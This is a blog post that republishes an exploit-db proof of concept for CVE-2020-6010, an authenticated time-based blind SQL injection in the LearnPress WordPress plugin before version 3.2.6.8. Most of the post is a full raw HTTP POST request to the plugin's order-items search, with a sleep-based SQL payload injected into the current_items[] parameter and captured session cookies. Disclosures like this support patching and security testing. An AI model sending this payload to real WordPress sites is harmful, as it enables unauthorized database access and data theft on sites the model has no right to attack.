[CVE-2020-6010] WordPress Plugin LearnPress < 3.2.6.8 – Time-Based Blind SQL Injection (Authenticated)

DB-Exploit: https://www.exploit-db.com/exploits/50137
PacketStorm: https://packetstormsecurity.com/files/163536/WordPress-LearnPress-SQL-Injection.html

Exploit Title: WordPress Plugin LearnPress < 3.2.6.8 – SQL Injection (Authenticated)

Date: 07-17-2021
Exploit Author: nhattruong or nhattruong.blog
Vendor Homepage: https://thimpress.com/learnpress/
Software Link: https://wordpress.org/plugins/learnpress/
Version: < 3.2.6.8
References link: https://wpscan.com/vulnerability/10208
CVE: CVE-2020-6010

POC:

  1. Go to url http:///wp-admin
  2. Login with a cred
  3. Execute the payload
Modify current_items[] as you want
POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 128
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145

type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items¤t_items[]=1 or sleep(1)-- -

Published by Nhat Truong

Hi

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: